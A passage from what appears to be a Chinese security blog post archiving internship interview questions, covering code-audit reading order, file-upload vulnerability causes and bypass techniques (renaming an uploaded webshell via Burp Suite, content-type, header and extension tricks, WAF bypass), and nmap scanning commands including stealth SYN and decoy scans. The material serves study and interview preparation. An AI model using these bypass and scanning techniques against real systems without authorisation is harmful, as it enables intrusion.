<h2 id="17-代码审计和移动安全有什么认识"><a href="#17-代码审计和移动安全有什么认识" class="headerlink" title="17. 代码审计和移动安全有什么认识"></a>17. 代码审计和移动安全有什么认识</h2><h3 id="代码审计"><a href="#代码审计" class="headerlink" title="代码审计"></a>代码审计</h3><ol>
<li>通读全文代码，从功能函数代码开始阅读，例如include文件夹下的common_fun.php，或者有类似关键字的文件。</li>
<li>看配置文件，带有config关键字的文件，找到mysql.class.php文件的connect()函数，查看在数据库连接时是否出现漏洞。</li>
<li>继续跟读首页文件,index.php,了解程序运作时调用了哪些函数和文件 以index.php文件作为标线，一层一层去扩展阅读所包含的文件，了解其功能，之后进入其功能文件夹的首页文件，进行扩展阅读</li>
</ol>
<h3 id="移动安全"><a href="#移动安全" class="headerlink" title="移动安全"></a>移动安全</h3><p>暂未涉及该部分</p>
<h2 id="18-文件上传"><a href="#18-文件上传" class="headerlink" title="18. 文件上传"></a>18. 文件上传</h2><h3 id="原因-3"><a href="#原因-3" class="headerlink" title="原因"></a>原因</h3><p>对用户文件上传内容控制不足或者处理缺陷，而导致的用户可以越过其本身权限向服务器上传可执行的动态脚本文件</p>
<h3 id="上传绕过"><a href="#上传绕过" class="headerlink" title="上传绕过"></a>上传绕过</h3><ol>
<li>客户端绕过</li>
</ol>
<p>使用 <code>burpsuite</code> 抓包改包，先上传符合要求后缀名木马，然后修改为 <code>php/asp/jsp</code> 后缀名</p>
<ol start="2">
<li>服务端绕过</li>
</ol>
<ul>
<li>更改content-type 字段绕过</li>
<li>文件头绕过</li>
<li>文件后缀名绕过</li>
<li>配合文件包含漏洞</li>
<li>服务器解析漏洞</li>
<li>操作系统文件命令规则</li>
<li>CMS、编辑器漏洞</li>
<li>其他规则</li>
<li>WAF绕过</li>
</ul>
<h1 id="0x03-说明"><a href="#0x03-说明" class="headerlink" title="0x03 说明"></a>0x03 说明</h1><p>该部分内容是本人觉得会提及到的问题，会陆续补充更新</p>
<h2 id="1-nmap-sP-192-168-1-0-24"><a href="#1-nmap-sP-192-168-1-0-24" class="headerlink" title="1. nmap -sP 192.168.1.0/24"></a>1. nmap -sP 192.168.1.0/24</h2><h3 id="获取远程主机的系统类型及开放端口"><a href="#获取远程主机的系统类型及开放端口" class="headerlink" title="获取远程主机的系统类型及开放端口"></a>获取远程主机的系统类型及开放端口</h3><p>nmap -sS -P0 -sV -O</p>
<p>可以是单一 IP、主机名、域名或者子网</p>
<ul>
<li>-sS TCP SYN 扫描（有称半开放，或隐身扫描）</li>
<li>-P0 允许你关闭 ICMP pings</li>
<li>-sV 打开系统版本检测</li>
<li>-O  尝试识别远程操作系统</li>
</ul>
<h3 id="列出开放了指定端口的主机列表"><a href="#列出开放了指定端口的主机列表" class="headerlink" title="列出开放了指定端口的主机列表"></a>列出开放了指定端口的主机列表</h3><p>nmap -sT -p 80 -oG -192.168.1.* | grep open</p>
<h3 id="在网络寻找所有在线主机"><a href="#在网络寻找所有在线主机" class="headerlink" title="在网络寻找所有在线主机"></a>在网络寻找所有在线主机</h3><p>nmap -sP 192.168.1.*</p>
<p>或者</p>
<p>nmap -sP 192.168.1.0/24</p>
<h3 id="ping-指定范围内的IP地址"><a href="#ping-指定范围内的IP地址" class="headerlink" title="ping 指定范围内的IP地址"></a>ping 指定范围内的IP地址</h3><p>nmap -sP 192.168.1.100-254</p>
<h3 id="使用诱饵扫描方法扫描主机端口"><a href="#使用诱饵扫描方法扫描主机端口" class="headerlink" title="使用诱饵扫描方法扫描主机端口"></a>使用诱饵扫描方法扫描主机端口</h3><p>sudo nmap -sS 192.168.1.10 -D 192.168.1.2</p>
<h1 id="0x04-关于知道创宇"><a href="#0x04-关于知道创宇" class="headerlink" title="0x04 关于知道创宇"></a>0x04 关于知道创宇</h1><ol>
<li>seebug</li>
<li>zoomeye</li>
<li>创宇盾</li>
<li>Kcon</li>
</ol>
<h1 id="0x05-后续"><a href="#0x05-后续" class="headerlink" title="0x05 后续"></a>0x05 后续</h1><p>目前已经过了实习生的面试，激动的等待offer中。但是在面试过程中，并没有出现直接提问的这样环节，面试官根据简历上的内容进行提问，双方互相交流，但后续的交流中有涉及上述的部分问题，具体的还是要看情况来，放轻松，以平常心来面对。</p>

    </article>
    <!-- license  -->
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href= "/2019/07/21/DVWA学习总结之Brute-Force/" title= "DVWA学习总结之Brute Force">
                    <div class="nextTitle">DVWA学习总结之Brute Force</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href= "/2019/06/06/VMware-无法联网问题解决/" title= "VMware-无法联网问题解决">
                    <div class="prevTitle">VMware-无法联网问题解决</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    

    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:lcug1416@gmail.com" class="iconfont-archer email" title=email ></a>
            
        
    
        
            
                <a href="//github.com/S1xHcL" class="iconfont-archer github" target="_blank" title=github></a>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
     
    <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x01-前言"><span class="toc-number">1.</span> <span class="toc-text">0x01 前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x02-正题"><span class="toc-number">2.</span> <span class="toc-text">0x02 正题</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-给你一个网站，你有什么渗透思路"><span class="toc-number">2.1.</span> <span class="toc-text">1. 给你一个网站，你有什么渗透思路</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Answer-1"><span class="toc-number">2.1.1.</span> <span class="toc-text">Answer 1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Answer-2"><span class="toc-number">2.1.2.</span> <span class="toc-text">Answer 2</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-MySQL-5-0版本前后有什么区别"><span class="toc-number">2.2.</span> <span class="toc-text">2. MySQL 5.0版本前后有什么区别</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-宽字节注入理解和利用"><span class="toc-number">2.3.</span> <span class="toc-text">3. 宽字节注入理解和利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#原理"><span class="toc-number">2.3.1.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#理解"><span class="toc-number">2.3.2.</span> <span class="toc-text">理解</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#利用"><span class="toc-number">2.3.3.</span> <span class="toc-text">利用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#防范"><span class="toc-number">2.3.4.</span> <span class="toc-text">防范</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-XSS成因及防护措施"><span class="toc-number">2.4.</span> <span class="toc-text">4. XSS成因及防护措施</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#原因"><span class="toc-number">2.4.1.</span> <span class="toc-text">原因</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#防护"><span class="toc-number">2.4.2.</span> <span class="toc-text">防护</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-DOM型XSS"><span class="toc-number">2.5.</span> <span class="toc-text">5. DOM型XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#原理-1"><span class="toc-number">2.5.1.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#触发"><span class="toc-number">2.5.2.</span> <span class="toc-text">触发</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#防护-1"><span class="toc-number">2.5.3.</span> <span class="toc-text">防护</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6-CSRF的成因及防护措施"><span class="toc-number">2.6.</span> <span class="toc-text">6. CSRF的成因及防护措施</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#本质"><span class="toc-number">2.6.1.</span> <span class="toc-text">本质</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#原因-1"><span class="toc-number">2.6.2.</span> <span class="toc-text">原因</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#防护-2"><span class="toc-number">2.6.3.</span> <span class="toc-text">防护</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7-同源策略"><span class="toc-number">2.7.</span> <span class="toc-text">7. 同源策略</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#8-SSRF"><span class="toc-number">2.8.</span> <span class="toc-text">8. SSRF</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#原理-2"><span class="toc-number">2.8.1.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#防御"><span class="toc-number">2.8.2.</span> <span class="toc-text">防御</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#9-XXE"><span class="toc-number">2.9.</span> <span class="toc-text">9. XXE</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#起因"><span class="toc-number">2.9.1.</span> <span class="toc-text">起因</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#防御-1"><span class="toc-number">2.9.2.</span> <span class="toc-text">防御</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#10-XSS窃取Cookie过程"><span class="toc-number">2.10.</span> <span class="toc-text">10. XSS窃取Cookie过程</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#11-sqlmap-参数"><span class="toc-number">2.11.</span> <span class="toc-text">11. sqlmap 参数</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Get型"><span class="toc-number">2.11.1.</span> <span class="toc-text">Get型</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Post型"><span class="toc-number">2.11.2.</span> <span class="toc-text">Post型</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#其他"><span class="toc-number">2.11.3.</span> <span class="toc-text">其他</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#补充"><span class="toc-number">2.11.4.</span> <span class="toc-text">补充</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#12-提权方式（window下）"><span class="toc-number">2.12.</span> <span class="toc-text">12. 提权方式（window下）</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#本地提权"><span class="toc-number">2.12.1.</span> <span class="toc-text">本地提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#常见服务器提权"><span class="toc-number">2.12.2.</span> <span class="toc-text">常见服务器提权</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#13-登录页面-购物系统存在的逻辑漏洞"><span class="toc-number">2.13.</span> <span class="toc-text">13. 登录页面. 购物系统存在的逻辑漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#14-PHP常见的导致文件包含函数"><span class="toc-number">2.14.</span> <span class="toc-text">14. PHP常见的导致文件包含函数</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#原因-2"><span class="toc-number">2.14.1.</span> <span class="toc-text">原因</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#include"><span class="toc-number">2.14.2.</span> <span class="toc-text">include()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#require"><span class="toc-number">2.14.3.</span> <span class="toc-text">require()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#include-once"><span class="toc-number">2.14.4.</span> <span class="toc-text">include_once()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#require-once"><span class="toc-number">2.14.5.</span> <span class="toc-text">require_once()</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#15-PHP文件包含利用的技巧"><span class="toc-number">2.15.</span> <span class="toc-text">15. PHP文件包含利用的技巧</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#PHP伪协议"><span class="toc-number">2.15.1.</span> <span class="toc-text">PHP伪协议</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Base64解密"><span class="toc-number">2.15.2.</span> <span class="toc-text">Base64解密</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#其他姿势"><span class="toc-number">2.15.3.</span> <span class="toc-text">其他姿势</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#16-python有什么成果"><span class="toc-number">2.16.</span> <span class="toc-text">16. python有什么成果</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#17-代码审计和移动安全有什么认识"><span class="toc-number">2.17.</span> <span class="toc-text">17. 代码审计和移动安全有什么认识</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#代码审计"><span class="toc-number">2.17.1.</span> <span class="toc-text">代码审计</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#移动安全"><span class="toc-number">2.17.2.</span> <span class="toc-text">移动安全</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#18-文件上传"><span class="toc-number">2.18.</span> <span class="toc-text">18. 文件上传</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#原因-3"><span class="toc-number">2.18.1.</span> <span class="toc-text">原因</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#上传绕过"><span class="toc-number">2.18.2.</span> <span class="toc-text">上传绕过</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x03-说明"><span class="toc-number">3.</span> <span class="toc-text">0x03 说明</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-nmap-sP-192-168-1-0-24"><span class="toc-number">3.1.</span> <span class="toc-text">1. nmap -sP 192.168.1.0/24</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#获取远程主机的系统类型及开放端口"><span class="toc-number">3.1.1.</span> <span class="toc-text">获取远程主机的系统类型及开放端口</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#列出开放了指定端口的主机列表"><span class="toc-number">3.1.2.</span> <span class="toc-text">列出开放了指定端口的主机列表</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#在网络寻找所有在线主机"><span class="toc-number">3.1.3.</span> <span class="toc-text">在网络寻找所有在线主机</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ping-指定范围内的IP地址"><span class="toc-number">3.1.4.</span> <span class="toc-text">ping 指定范围内的IP地址</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#使用诱饵扫描方法扫描主机端口"><span class="toc-number">3.1.5.</span> <span class="toc-text">使用诱饵扫描方法扫描主机端口</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x04-关于知道创宇"><span class="toc-number">4.</span> <span class="toc-text">0x04 关于知道创宇</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x05-后续"><span class="toc-number">5.</span> <span class="toc-text">0x05 后续</span></a></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 11
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 2019 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/10</span><a class="archive-post-title" href= "/2019/09/10/利用微信DLL劫持获取shell/" >利用微信DLL劫持获取shell</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/09</span><a class="archive-post-title" href= "/2019/09/09/CVE-2019-0708-复现/" >CVE-2019-0708 复现</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/20</span><a class="archive-post-title" href= "/2019/08/20/局域网内ARP欺骗/" >局域网内ARP欺骗</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/07</span><a class="archive-post-title" href= "/2019/08/07/关于cors的漏洞利用/" >关于cors的漏洞利用</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/04</span><a class="archive-post-title" href= "/2019/08/04/DVWA学习总结之CSRF/" >DVWA学习总结之CSRF</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/01</span><a class="archive-post-title" href= "/2019/08/01/33款APP安全性测试总结/" >33款APP安全性测试总结</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">07/31</span><a class="archive-post-title" href= "/2019/07/31/工作小记_1/" >工作小记</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">07/21</span><a class="archive-post-title" href= "/2019/07/21/DVWA学习总结之Brute-Force/" >DVWA学习总结之Brute Force</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/20</span><a class="archive-post-title" href= "/2019/06/20/知道创宇面试题归档/" >知道创宇面试题归档</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/06</span><a class="archive-post-title" href= "/2019/06/06/VMware-无法联网问题解决/" >VMware-无法联网问题解决</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/06</span><a class="archive-post-title" href= "/2019/05/06/2019-ISCC-WriteUp【web】/" >2019-ISCC-WriteUp【web】</a>
        </li>
    
    </div>
  </div>
        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
    
        <span class="sidebar-tag-name" data-tags="Windows"><span class="iconfont-archer">&#xe606;</span>Windows</span>
    
        <span class="sidebar-tag-name" data-tags="CVE"><span class="iconfont-archer">&#xe606;</span>CVE</span>
    
        <span class="sidebar-tag-name" data-tags="RDP"><span class="iconfont-archer">&#xe606;</span>RDP</span>
    
        <span class="sidebar-tag-name" data-tags="work"><span class="iconfont-archer">&#xe606;</span>work</span>
    
        <span class="sidebar-tag-name" data-tags="App"><span class="iconfont-archer">&#xe606;</span>App</span>
    
        <span class="sidebar-tag-name" data-tags="Web"><span class="iconfont-archer">&#xe606;</span>Web</span>
    
        <span class="sidebar-tag-name" data-tags="WriteUp"><span class="iconfont-archer">&#xe606;</span>WriteUp</span>
    
        <span class="sidebar-tag-name" data-tags="CTF"><span class="iconfont-archer">&#xe606;</span>CTF</span>
    
        <span class="sidebar-tag-name" data-tags="Tools"><span class="iconfont-archer">&#xe606;</span>Tools</span>
    
        <span class="sidebar-tag-name" data-tags="Vmware"><span class="iconfont-archer">&#xe606;</span>Vmware</span>
    
        <span class="sidebar-tag-name" data-tags="DLL"><span class="iconfont-archer">&#xe606;</span>DLL</span>
    
        <span class="sidebar-tag-name" data-tags="APT"><span class="iconfont-archer">&#xe606;</span>APT</span>
    
        <span class="sidebar-tag-name" data-tags="tips"><span class="iconfont-archer">&#xe606;</span>tips</span>
    
        <span class="sidebar-tag-name" data-tags="sqlmap"><span class="iconfont-archer">&#xe606;</span>sqlmap</span>
    
        <span class="sidebar-tag-name" data-tags="arp"><span class="iconfont-archer">&#xe606;</span>arp</span>
    
        <span class="sidebar-tag-name" data-tags="web"><span class="iconfont-archer">&#xe606;</span>web</span>
    
        <span class="sidebar-tag-name" data-tags="Dvwa"><span class="iconfont-archer">&#xe606;</span>Dvwa</span>
    
        <span class="sidebar-tag-name" data-tags="Interview"><span class="iconfont-archer">&#xe606;</span>Interview</span>
    
        <span class="sidebar-tag-name" data-tags="Work"><span class="iconfont-archer">&#xe606;</span>Work</span>
    
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
    缺失模块。<br/>
    1、请确保node版本大于6.2<br/>
    2、在博客根目录（注意不是archer根目录）执行以下命令：<br/>
    <span style="color: #f75357; font-size: 1rem; line-height: 2rem;">npm i hexo-generator-json-content --save</span><br/>
    3、在根目录_config.yml里添加配置：
    <pre style="color: #787878; font-size: 0.6rem;">
jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true</pre>
    </div> 
    <div class="sidebar-tags-list"></div>
</div>
        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
        <span class="sidebar-category-name" data-categories="CVE"><span class="iconfont-archer">&#xe60a;</span>CVE</span>
    
        <span class="sidebar-category-name" data-categories="work"><span class="iconfont-archer">&#xe60a;</span>work</span>
    
        <span class="sidebar-category-name" data-categories="CTF"><span class="iconfont-archer">&#xe60a;</span>CTF</span>
    
        <span class="sidebar-category-name" data-categories="Tools"><span class="iconfont-archer">&#xe60a;</span>Tools</span>
    
        <span class="sidebar-category-name" data-categories="CVE/EXP"><span class="iconfont-archer">&#xe60a;</span>CVE/EXP</span>
    
        <span class="sidebar-category-name" data-categories="APT"><span class="iconfont-archer">&#xe60a;</span>APT</span>
    
        <span class="sidebar-category-name" data-categories="work/tools"><span class="iconfont-archer">&#xe60a;</span>work/tools</span>
    
        <span class="sidebar-category-name" data-categories="web"><span class="iconfont-archer">&#xe60a;</span>web</span>
    
        <span class="sidebar-category-name" data-categories="CTF/Web"><span class="iconfont-archer">&#xe60a;</span>CTF/Web</span>
    
        <span class="sidebar-category-name" data-categories="CVE/EXP/MSF"><span class="iconfont-archer">&#xe60a;</span>CVE/EXP/MSF</span>
    
        <span class="sidebar-category-name" data-categories="APT/shell"><span class="iconfont-archer">&#xe60a;</span>APT/shell</span>
    
        <span class="sidebar-category-name" data-categories="Web"><span class="iconfont-archer">&#xe60a;</span>Web</span>
    
        <span class="sidebar-category-name" data-categories="Work"><span class="iconfont-archer">&#xe60a;</span>Work</span>
    
        <span class="sidebar-category-name" data-categories="work/web"><span class="iconfont-archer">&#xe60a;</span>work/web</span>
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>
    </div>
</div> 
    <script>
    var siteMeta = {
        root: "/",
        author: "S1xHcL"
    }
</script>
    <!-- CDN failover -->
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ === 'undefined')
        {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js">\x3C/script>')
        }
    </script>
    <script src="/scripts/main.js"></script>
    <!-- algolia -->
    
    <!-- busuanzi  -->
    
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
    <!-- CNZZ  -->
    
    </div>
    <!-- async load share.js -->
    
        <script src="/scripts/share.js" async></script>    
     
    </body>
</html>


